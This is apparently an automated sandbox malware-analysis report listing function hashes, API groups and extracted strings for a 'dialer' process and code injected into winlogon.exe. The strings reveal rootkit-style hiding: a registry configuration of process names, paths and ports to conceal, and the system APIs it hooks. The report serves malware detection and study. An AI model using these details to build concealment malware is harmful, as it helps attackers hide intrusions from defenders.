                                                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: dialersvc64
                                                        • API String ID: 4184240511-3881820561
                                                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                         • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                         • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\dialerconfig
                                                        • API String ID: 3013565938-461861421
                                                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: File$Write$CloseCreateHandle
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 148219782-3440882674
                                                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.1572740595.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000019.00000002.1572708660.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572776902.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000019.00000002.1572816213.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 1646373207-2227199552
                                                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                        Execution Graph

                                                        Execution Coverage:1.3%
                                                        Dynamic/Decrypted Code Coverage:94.1%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:101
                                                        Total number of Limit Nodes:16

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 5a9fcc6cd55dee6a316c52f2010dba24f70424c837c5cf46fdf9dedb95e6d04b
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: D8712A36710A1286EB919F21E8906E92364F7E4BE8F405231FE5E57BACDE3CCA44C344

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: ea3d30c06083b22014454e8c8fffd79e95962deda3e2360bae8acdd5a724b91a
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 99113C36704B4282EF959F11E4046B962A0F798BE5F840239EEA9077D8EF3DCA05C708

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction ID: a353196f63e3f686d0841e7f12a7e206c81323a03f893301661436a76609e4c4
                                                        • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                        • Instruction Fuzzy Hash: 40D19A36205B4981DAB19B06E4913AA77A0F7D8BD5F140226EE9D47BE9DF3CCA41CB04

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction ID: 48e9b6394c2e16e0435a437a14de86af20b7fc3907a494e4619b9524de145d43
                                                        • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                        • Instruction Fuzzy Hash: 0A02CA32219B8586EBA1CB55E4903AAB7A0F3D47D5F100125FA9E47BE8DF7CC944CB04

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Virtual$AllocQuery
                                                        • String ID:
                                                        • API String ID: 31662377-0
                                                        • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction ID: e020fba28db42efb86b7b281ff6320db8e868d5782e8dd22b64bfe2f8f0cfe4e
                                                        • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                        • Instruction Fuzzy Hash: 74314132219A8581EAB2DB15E0503AE66A0F3D87D4F500635F9DE46BECDF7DCB509B08

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 64b7ee1ffacfb3a96812083a67adc2b6f64ddc7d970daca41989523910d28d47
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 52115E3061060382FBE6AB64E8457F92294A7F43E5F944334BD26825D9EF7DCA449208

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                        • String ID:
                                                        • API String ID: 3733156554-0
                                                        • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction ID: 4724cafcdfdbfa4d6616eb3151ddc47c4ed22c72909894bd528e3ad7df338f73
                                                        • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                        • Instruction Fuzzy Hash: CAF03036218B05C0D6B1DB01E4417AA6BA0F7D87F4F140225FE9D43BADCA3CCB848B44

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocLibraryLoadVirtual
                                                        • String ID:
                                                        • API String ID: 3550616410-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: c04cbf0e898960135302cb09ad6b63cbc2f212c8dd94948b103ddf5d24b099a9
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: 9E61C136F0169287DF958F6590407B9F392FBA4BA4F948231EE69077C8EB38D952C700

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001F385BC1628: GetProcessHeap.KERNEL32 ref: 000001F385BC1633
                                                          • Part of subcall function 000001F385BC1628: HeapAlloc.KERNEL32 ref: 000001F385BC1642
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16B2
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC16DF
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC16F9
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1719
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1734
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1754
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC176F
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC178F
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17AA
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC17CA
                                                        • Sleep.KERNEL32 ref: 000001F385BC1AD7
                                                        • SleepEx.KERNELBASE ref: 000001F385BC1ADD
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC17E5
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1805
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1820
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC1840
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC185B
                                                          • Part of subcall function 000001F385BC1628: RegOpenKeyExW.ADVAPI32 ref: 000001F385BC187B
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC1896
                                                          • Part of subcall function 000001F385BC1628: RegCloseKey.ADVAPI32 ref: 000001F385BC18A0
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 10bcb2d6682a129b921ec7b08a8e6ea337be82993633d3c01402af06af3f6023
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 8731FF7120164341FFD69B26D6413F953A4ABE4BF0F045631BE3AA73DDEE28CE518614

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: ef4c410e6d960397a7e29bb07b90f3ccf10a3190337873fb1e91f7c74c59de08
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: F061E632B0165187DF958F95A8007B9B392FBA4BE4F948235EE69877C8DA38D952C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 3e014252695f0c00fb7a0bb71849fee8b47a642a1c148055653ae182c2af6344
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 54B1807221065282EF9A9F65C4407F9A3A4F7A5BE4F445226FEA9637D8DF38CE40C344
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: e0b9b7052118a7287e8f390f34dccee8bc25c43afc6201edd398442163f3e76f
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 43315D72205B818AEBA19F64E8403EE7364F795794F44413AEE5D47B98EF3CCA48C714
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: 119532e0019eb03a6f85644e89c7b11ad2598611322a358013ebae4ac99bf1c6
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: E2310B36214B818ADBA18F25E8403EE63A4F7D97A4F540225FEAD47B99DF3CC6558B00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 886ad51172aaf13e8012940450bcb762d4a0f855fb16cb69d876ae1c8491be24
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: D5111F32750B0289EF81CF60E8553A833A4F7697A8F441E35EE6D47799DB7CC6988380
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction ID: 0ab57e8a41362360b4c2b69986fe903eab220494ac42150a3405ac5a4fa8be70
                                                        • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                        • Instruction Fuzzy Hash: AD51C5367006C189FB619B72A8407EA7BA5F7947E4F144225FE6867BDDDA3CCA01C704
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction ID: 6dd60b39cab2d84fa712c6e0a873e69cabff84c93a7a43a81c19e979f1af2cba
                                                        • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                        • Instruction Fuzzy Hash: 7AF068717152558EEFD98F68A40276977D1F3583D0FD08129EA9A83B48D27C8150CF04

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: b2b3583c4c13428535a8a1f942f546f92154c8786cef82e3cf051c49b1cbc2ed
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 63515B32200B8686EB95CF62E4483AA77A1F7D9BE9F544234EE5907798DF3CC645CB00

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: d595e3e3372c9b20bd3718418993cbc429e4e82f856070faa9de1b73c2b9a119
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: 9831877414098BA4EE87EFA5E8516F46321A7E43E4F844273BCB9122ED9E7C8B49C354

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: dd5b60a4949fe2c9e32b5ccc5ae674ce106a1ad1d7178672b7aede5bfdb929d8
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: E381903260060387FAD69FA594413F962A0ABE57E0F94A235BD65C77DEDB3CCB458700

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: 4409f07fb228c0d555485b01c2f5db390ec7bc0f911a69b9524e815b9d6d2938
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 6081AB3160060386FAD39F6594413F966A1ABE57E0FA48235BE25477DEFB3CCB468701
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 000001F385BCCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCEBC
                                                        • SetLastError.KERNEL32 ref: 000001F385BCCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,000001F385BCECCC,?,?,?,?,000001F385BCBF9F,?,?,?,?,?,000001F385BC7AB0), ref: 000001F385BCCF2C
                                                          • Part of subcall function 000001F385BCD6CC: HeapAlloc.KERNEL32 ref: 000001F385BCD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF54
                                                          • Part of subcall function 000001F385BCD744: HeapFree.KERNEL32 ref: 000001F385BCD75A
                                                          • Part of subcall function 000001F385BCD744: GetLastError.KERNEL32 ref: 000001F385BCD764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F385BD0A6B,?,?,?,000001F385BD045C,?,?,?,000001F385BCC84F), ref: 000001F385BCCF76
                                                        Memory Dump Source
